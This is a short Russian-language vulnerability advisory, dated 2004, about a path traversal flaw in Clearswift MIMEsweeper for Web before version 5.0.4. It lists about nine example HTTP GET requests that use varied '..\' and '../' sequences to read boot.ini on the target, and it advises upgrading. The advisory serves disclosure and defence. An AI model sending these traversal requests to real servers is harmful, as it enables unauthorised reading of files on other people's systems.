Просмотр произвольных файлов в Clearswift MIMEsweeper

Дата публикации:	15.08.2004
Всего просмотров:	1044
Опасность:	Средняя
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: Clearswift MIMEsweeper до версии 5.0.4 Описание: Уязвимость в Clearswift MIMEsweeper для Web позволяет удаленному пользователю просматривать файлы на целевой системе. Пример: GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0 GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0 GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0 GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0 GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0 GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0 GET /foobar/\../\../\../\../\boot.ini HTTP/1.0 GET /foobar/../../../../boot.ini HTTP/1.0 GET /foobar\..\..\..\..\boot.ini HTTP/1.0 URL производителя: http://www.clearswift.com/products/msw/msw_web/default.aspx Решение:Установите обновленную версию программы (5.0.4 или более позднюю версию).
Ссылки:	Clearswift Mimesweeper Path Traversal Vulnerability

Подпишитесь на email рассылку